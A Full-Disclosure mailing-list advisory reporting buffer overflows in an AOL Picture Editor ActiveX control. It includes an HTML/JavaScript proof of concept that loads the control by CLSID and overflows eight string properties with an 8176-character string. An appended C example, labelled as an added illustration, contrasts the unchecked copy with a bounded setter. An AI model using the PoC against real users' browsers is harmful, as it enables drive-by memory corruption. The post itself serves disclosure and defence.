[Full-disclosure] AOL YGP Picture Editor YGPPicEdit.dll Multiple Buffer Overflows



The AOL YGP Picture Editor Control (AIM PicEditor Control) version 9.5.1.8 suffers from multiple exploitable buffer overflows: assigning an overlong string (8176 characters in the PoC below) to any of several string properties overflows a fixed-size buffer inside the control. The control is marked safe for scripting, so any web page rendered in Internet Explorer can instantiate it by CLSID and set these properties from script. I have not tested other versions. PoC as follows:

----------------
<!--
written by e.b.
-->
<html>
<head>
<script type="text/javascript">
// Build an 8176-character string (the loop appends until the length
// passes 8175) and assign it to each string property of the control in turn.
function Check() {
var s = 'A';

while (s.length <= 8175) s = s + 'A';

obj.DisplayName = s;
obj.FinalSavePath = s;
obj.ForceSaveTo = s;
obj.HiddenControls = s;
obj.InitialEditorScreen = s;
obj.Locale = s;
obj.Proxy = s;
obj.UserAgent = s;
}
</script>

</head>
<!-- Internet Explorer instantiates the control by CLSID; because it is marked
     safe for scripting the assignments above are allowed. Check() runs once the
     page, and therefore the control, has loaded. -->
<body onload="Check();">
<object id="obj" classid="clsid:085891E5-ED86-425F-8522-C10290FA8309">
</object>
</body>
</html>
----------------
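The bug class behind the PoC, as an added illustration that is not the control's code and not part of the original post: a property setter that copies a caller-supplied string into a fixed-size field without checking its length, next to the checked version that every string property should share. The control's real field sizes and internals are unknown; the 4096-element capacity, the `pic_editor` struct and the field names are assumptions chosen so that the PoC's 8176-character string does not fit, and `wchar_t`/`wcslen()` stand in for the BSTR and `SysStringLen()` a real COM setter would use.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <wchar.h>

/* Assumed capacity of one fixed-size property field inside the control.
 * The advisory does not give the real size; 4096 is chosen so that the
 * PoC's 8176-character string does not fit. */
#define PROP_CAP 4096

/* Hypothetical control state: one fixed buffer per scriptable string
 * property (two of the eight named in the PoC are enough to show the pattern). */
struct pic_editor {
    wchar_t display_name[PROP_CAP];
    wchar_t user_agent[PROP_CAP];
};

/* Vulnerable pattern: the setter trusts the scripting caller and copies the
 * whole incoming string into the fixed field. With a value of PROP_CAP or more
 * wide characters this writes past the end of the field (undefined behaviour;
 * this is the bug class the advisory reports). Kept for contrast only; never
 * call it with an attacker-controlled length. */
void put_display_name_unsafe(struct pic_editor *ed, const wchar_t *value)
{
    wcscpy(ed->display_name, value);
}

/* Hardened pattern shared by every string property: measure first, refuse
 * anything that does not fit including the terminator, then copy exactly
 * that many bytes. In a COM setter the length would come from SysStringLen()
 * on the BSTR; wcslen() stands in for it here.
 * Returns 0 on success, -1 if the value was rejected (dst is left unchanged). */
int set_string_prop(wchar_t *dst, size_t cap, const wchar_t *value)
{
    size_t len = wcslen(value);
    if (len >= cap)
        return -1;
    memcpy(dst, value, (len + 1) * sizeof *dst);
    return 0;
}

/* Build a PoC-style payload: n copies of 'A', NUL terminated. Caller frees. */
wchar_t *make_payload(size_t n)
{
    wchar_t *p = malloc((n + 1) * sizeof *p);
    if (!p)
        return NULL;
    wmemset(p, L'A', n);
    p[n] = L'\0';
    return p;
}

/* Feed an n-character payload to the checked DisplayName setter of a fresh
 * control. Returns the setter's status (0 accepted, -1 rejected), or -2 if
 * the payload could not be allocated. */
int try_payload(size_t n)
{
    struct pic_editor ed;
    wchar_t *p = make_payload(n);
    int rc;

    if (!p)
        return -2;
    memset(&ed, 0, sizeof ed);
    rc = set_string_prop(ed.display_name, PROP_CAP, p);
    free(p);
    return rc;
}

int main(void)
{
    /* 8176 is what the PoC's loop produces: it appends while s.length <= 8175. */
    printf("DisplayName, 11 chars:   rc=%d\n", try_payload(11));
    printf("DisplayName, %d chars: rc=%d\n", PROP_CAP - 1, try_payload(PROP_CAP - 1));
    printf("DisplayName, %d chars: rc=%d\n", PROP_CAP, try_payload(PROP_CAP));
    printf("DisplayName, 8176 chars: rc=%d\n", try_payload(8176));
    return 0;
}
```

The check is `len >= cap`, not `len > cap`, so the terminator is always accounted for, and the field is untouched when a value is rejected. A control marked safe for scripting cannot assume anything about who sets its properties, so the same bounded copy belongs in every `put_*` setter, not only the one the PoC happens to hit first.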

Happy Holidays to all!

Elazar

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/